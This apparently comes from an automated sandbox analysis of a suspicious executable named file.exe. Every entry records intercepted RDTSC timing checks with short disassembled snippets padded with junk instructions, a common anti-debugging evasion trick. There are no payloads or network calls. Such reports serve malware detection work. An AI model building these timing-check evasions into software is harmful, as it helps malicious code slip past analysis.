                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1360 second address: 9A136A instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F322 second address: 99F35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC8B2DAA2h 0x00000013 jmp 00007FFBC8B2DA9Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5C9 second address: 99F5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5CE second address: 99F5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FFBC8B2DA96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5D9 second address: 99F5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5F8 second address: 99F5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FB8F second address: 99FB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A041E second address: 9A0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0A01 second address: 9A0A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFBC91A3BDCh 0x0000000a jmp 00007FFBC91A3BDFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0C72 second address: 9A0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5FFD second address: 9A6001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5300 second address: 9A5322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5322 second address: 9A5326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5326 second address: 9A5338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A55C6 second address: 9A55D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jbe 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A55D9 second address: 9A5607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FFBC8B2DA9Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5607 second address: 9A560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A560C second address: 9A5613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5613 second address: 9A562E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE3h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5A84 second address: 9A5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5A9E second address: 9A5AD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FFBC91A3BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC91A3BDDh 0x00000013 pushad 0x00000014 jmp 00007FFBC91A3BE2h 0x00000019 jo 00007FFBC91A3BD6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5C36 second address: 9A5C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnc 00007FFBC8B2DAB0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FFBC8B2DA9Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA666 second address: 9AA68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FFBC91A3BD6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFBC91A3BE1h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA68C second address: 9AA690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA690 second address: 9AA69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FFBC91A3BD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1F07 second address: 9B1F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B209B second address: 9B20A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B20A1 second address: 9B20A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B264B second address: 9B2653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2653 second address: 9B2685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFBC8B2DA96h 0x0000000a jmp 00007FFBC8B2DA9Ah 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FFBC8B2DAA6h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2908 second address: 9B290C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B290C second address: 9B2916 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2916 second address: 9B2922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2922 second address: 9B2926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2926 second address: 9B2937 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFBC91A3BDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2937 second address: 9B293C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B293C second address: 9B2976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC91A3BE8h 0x00000013 jmp 00007FFBC91A3BDDh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2D8F second address: 9B2DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2DA9 second address: 9B2DB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3423 second address: 9B3429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3429 second address: 9B3431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3431 second address: 9B3435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6075 second address: 9B6079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6079 second address: 9B6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAA83 second address: 9BAA8D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAA8D second address: 9BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5209 second address: 9C520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C520D second address: 9C5225 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FFBC8B2DA96h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D03A6 second address: 9D03C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDAh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FFBC91A3BE2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8BA0 second address: 9D8BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8BA6 second address: 9D8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDAh 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E027D second address: 9E0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0281 second address: 9E02A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E02A1 second address: 9E02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E02A5 second address: 9E02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E041F second address: 9E0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E06C0 second address: 9E06DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jo 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E06DC second address: 9E06FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FFBC8B2DA9Eh 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E06FD second address: 9E0722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC91A3BDEh 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FFBC91A3BD6h 0x00000013 pop esi 0x00000014 ja 00007FFBC91A3BDCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E087B second address: 9E08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFBC8B2DA96h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E08A2 second address: 9E08AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E08AE second address: 9E08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e je 00007FFBC8B2DA96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E08CE second address: 9E08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0A54 second address: 9E0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC8B2DA9Ch 0x0000000a popad 0x0000000b jo 00007FFBC8B2DAC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0A70 second address: 9E0A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0A74 second address: 9E0A7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0A7A second address: 9E0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FFBC91A3BD6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E142D second address: 9E1433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3131 second address: 9E3137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3137 second address: 9E313B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E313B second address: 9E3149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F22 second address: 9E2F3D instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 jmp 00007FFBC8B2DAA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F3D second address: 9E2F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F47 second address: 9E2F4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F4D second address: 9E2F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F69 second address: 9E2F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F6D second address: 9E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2F88 second address: 9E2FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DA9Bh 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 jp 00007FFBC8B2DA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C1A second address: 9E5C24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C24 second address: 9E5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FFBC8B2DA96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E58DE second address: 9E58E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F425C second address: 9F4260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4260 second address: 9F426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02FD7 second address: A02FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02FDD second address: A02FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FFBC91A3BD6h 0x0000000d jmp 00007FFBC91A3BE5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02FFF second address: A03005 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03005 second address: A0302F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC91A3BE8h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FFBC91A3BD6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02B41 second address: A02B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A126A3 second address: A126B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12AF2 second address: A12B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12F85 second address: A12FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12FA8 second address: A12FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13129 second address: A13145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FFBC91A3BE6h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13467 second address: A1346E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1360C second address: A13614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
